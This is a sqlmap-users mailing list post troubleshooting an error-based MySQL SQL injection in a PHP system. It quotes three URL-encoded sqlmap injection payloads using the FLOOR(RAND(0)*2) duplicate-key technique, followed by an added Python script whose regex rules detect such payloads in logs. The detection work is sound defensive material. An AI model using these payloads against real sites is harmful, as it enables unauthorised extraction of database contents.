A PHP/MySQL system has a simple, integer SQL injection. The only working
technique is error based (verified and successfully exploited manually).
Any other techniques cause the server to not reply, just stall. When using
sqlmap with --dbms=mysql and --technique=E, sqlmap successfully does 3
requests, but does something different on the fourth which causes the
server to time out and never reply. The successful requests are:

* id=1%22%27%29%5B.%27%29%28%5D%5B
* id=1%29%20AND%20%28SELECT%201561%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a70736c3a%2C%28SELECT%20%28CASE%20WHEN%20%281561%3D1561%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a6d683a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%286864%3D6864
* id=1%20AND%20%28SELECT%201561%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a70736c3a%2C%28SELECT%20%28CASE%20WHEN%20%281561%3D1561%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a6d683a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29

The fourth request, which I sadly don't have saved, fails. Casual glance
suggested it was different from these and was not error based (I might be
wrong).
--
Konrads Smelkovs
Applied IT sorcery.
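
For readers looking at this traffic from the logging side, an added example (not part of the original post and not sqlmap code): it URL-decodes the three quoted `id` values and labels each with simple detection rules. The rule names, the regexes and the benign value `42` are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Shared middle of requests 2 and 3, copied from the post.
CORE = ("%20AND%20%28SELECT%201561%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT"
        "%280x3a70736c3a%2C%28SELECT%20%28CASE%20WHEN%20%281561%3D1561%29%20THEN"
        "%201%20ELSE%200%20END%29%29%2C0x3a7a6d683a%2CFLOOR%28RAND%280%29%2A2%29"
        "%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29")

SAMPLES = [
    "1%22%27%29%5B.%27%29%28%5D%5B",            # request 1 from the post
    "1%29" + CORE + "%20AND%20%286864%3D6864",  # request 2 from the post
    "1" + CORE,                                 # request 3 from the post
    "42",                                       # constructed benign value
]

# Hypothetical rule set: name -> pattern applied to the decoded value.
RULES = [
    # A quote directly followed by a bracket: syntax-breaking probe string.
    ("quote_bracket_probe", re.compile(r"[\"'][()\[\]]")),
    # FLOOR(RAND(0)*2) used as a GROUP BY key: duplicate-key error technique.
    ("double_query_error", re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S)),
    # CONCAT starting with a hex literal: delimiter wrapped around the output.
    ("hex_marker_concat", re.compile(r"concat\s*\(\s*0x[0-9a-f]+", re.I)),
    ("information_schema", re.compile(r"information_schema\.", re.I)),
]


def classify(raw):
    """Return the names of all rules the URL-decoded parameter value triggers."""
    value = unquote(raw)
    # The post says the parameter is an integer, so anything else is suspect.
    hits = [] if re.fullmatch(r"-?\d+", value) else ["non_integer"]
    hits += [name for name, rx in RULES if rx.search(value)]
    return hits


def markers(raw):
    """Decode hex literals (0x...) in the value into the text they stand for."""
    found = re.findall(r"0x((?:[0-9a-f]{2})+)", unquote(raw), re.I)
    return [bytes.fromhex(h).decode("latin-1") for h in found]


if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample), markers(sample))
```

The decoded markers are the delimiters that surround the extracted value in the resulting MySQL duplicate-entry error, so the same strings can be searched for in database and application error logs.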
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
